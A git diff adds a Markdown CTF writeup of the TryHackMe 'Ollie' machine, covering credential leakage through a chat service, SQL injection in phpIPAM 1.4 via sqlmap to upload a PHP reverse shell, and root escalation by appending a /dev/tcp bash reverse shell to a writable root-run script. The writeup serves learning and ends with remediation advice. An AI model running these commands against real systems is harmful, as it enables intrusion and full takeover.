add: writeup-ctf

content/writeup-ctf/writeup-ollie-thm/index.md

@@ -0,0 +1,159 @@
+---
+title: "Writeup - Ollie (THM)"
+date: 2022-04-22
+slug: "writeup-ollie-thm"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Ollie](https://tryhackme.com/room/ollie) machine from the TryHackMe site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.147.194
+```
+Three TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2p1)
+- 80/tcp : HTTP web server (Apache 2.4.41)
+- 1337/tcp : Chat and file  sharing (waste)
+
+![](img/image-2.webp)
+
+## Exploit
+
+First of all I connect via netcat to the waste port to see if I can get some information.
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/Documents]
+└─$ nc 10.10.147.194 1337             
+Hey stranger, I'm Ollie, protector of panels, lover of deer antlers.
+
+What is your name? azerty
+What's up, Azerty! It's been a while. What are you here for? test
+Ya' know what? Azerty. If you can answer a question about me, I might have something for you.
+
+
+What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? Bulldog
+You are correct! Let me confer with my trusted colleagues; Benny, Baxter and Connie...
+Please hold on a minute
+Ok, I'm back.
+After a lengthy discussion, we've come to the conclusion that you are the right person for the job.Here are the credentials for our administration panel.
+
+                    Username: admin
+
+                    Password: OllieUnixMontgomery!
+
+PS: Good luck and next time bring some treats!
+
+```
+After some tests, I find that the chat returns credencials for an admin panel. If I go to the port 80 site, I find a login page, so I test the credencials and it works!
+
+![](img/image-3.webp)
+
+This is an administration page based on `phpIPAM 1.4` after some research I find the following exploit : [exploit](https://fluidattacks.com/advisories/mercury/). I try to apply it to see if it works. 
+
+![](img/image-4.webp)
+
+After following the different steps, the exploit works, so we can now perform SQL injections! To automate the upload process of a php reverse shell I will use `sqlmap`. I start by extracting a query with Burp :
+
+
+```bash
+POST /app/admin/routing/edit-bgp-mapping-search.php HTTP/1.1
+Host: 10.10.196.154
+Content-Length: 20
+Accept: */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Sa>
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://10.10.196.154
+Referer: http://10.10.196.154/index.php?page=tools&section=routing&subnetId=bgp&sPage=2
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: phpipamredirect=%2Findex.php%3Fpage%3Dtools%26section%3Drouting%26subnetId%3Dbgp%26sPage%3D2; phpipam=151l3>
+Connection: close
+
+subnet=test&bgp_id=2
+```
+Then with the following command I send my php file :
+
+
+```bash
+sqlmap -r request.txt --file-write=reverse.php --file-dest=/var/www/html/reverse.php --batch
+```
+![](img/image-5.webp)
+
+After running netcat I can access the file and create a reverse shell.
+
+![](img/image-6.webp)
+
+After some research I find that a user folder: `ollie`. So I try to change the user with the password I found before:
+
+![](img/image-7.webp)
+
+I can now recover the first flag.
+
+
+```bash
+ollie@hackerdog:~$ cat user.txt
+cat user.txt
+THM{Ollie_boi_is_daH_Cut3st}
+```
+## Privilege escalation
+
+I start by running [linpeas.sh](https://linpeas.sh) but I don't find anything interesting. So I try to list the services with [pspy64](https://github.com/DominicBreuker/pspy).
+
+
+```bash
+ollie@hackerdog:~$ ./pspy64
+./pspy64
+pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
+
+
+     ██▓███    ██████  ██▓███ ▓██   ██▓
+    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
+    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
+    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
+    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
+    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
+    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
+    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
+                   ░           ░ ░     
+                               ░ ░     
+
+Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
+Draining file system events due to startup...
+done
+[...]
+2022/04/13 10:11:43 CMD: UID=0    PID=1355   | python3 -u olliebot.py
+[...]
+2022/04/13 10:12:04 CMD: UID=0    PID=37813  | /bin/bash /usr/bin/feedme
+[...]
+```
+In the result of the command I see 2 interesting services executed by the UID=0 i.e. root. The second one is a bash script but without any particular content. But I have write permission.
+
+![](img/image-8.webp)
+
+So I add a reverse shell in the file with the following command:
+
+
+```bash
+echo "/bin/bash -i >& /dev/tcp/10.8.3.186/2345 0>&1" >> /usr/bin/feedme
+```
+Then after a few seconds, I have a reverse shell root and I can recover the last flag.
+
+![](img/image-9.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not put credentials in a public chat
+- Do not use the same password for a session and a web service
+- Do not allow scripts executed by root to be writable by other users